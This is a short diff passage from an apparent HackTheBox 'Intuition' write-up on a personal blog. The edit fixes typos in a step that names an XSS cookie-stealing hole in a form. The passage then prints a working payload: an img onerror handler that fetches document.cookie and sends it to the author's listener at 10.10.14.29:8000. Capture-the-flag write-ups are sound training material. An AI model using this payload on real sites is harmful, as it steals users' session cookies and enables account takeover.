jadu101/jadu101.github.io/content/Hackthebox📦/Linux🐧/HTB-Intuition.md

 From some research, we have discovered that this form is vulnerable to XSS Cookie Stealing.

-Let's use the following payload on borth field of the form with out Python server listening:
+Let's use the following payload on both fields of the form with out Python server listening:

 ```html
 <img src=x onerror="fetch('http://10.10.14.29:8000/?cookie='+document.cookie)">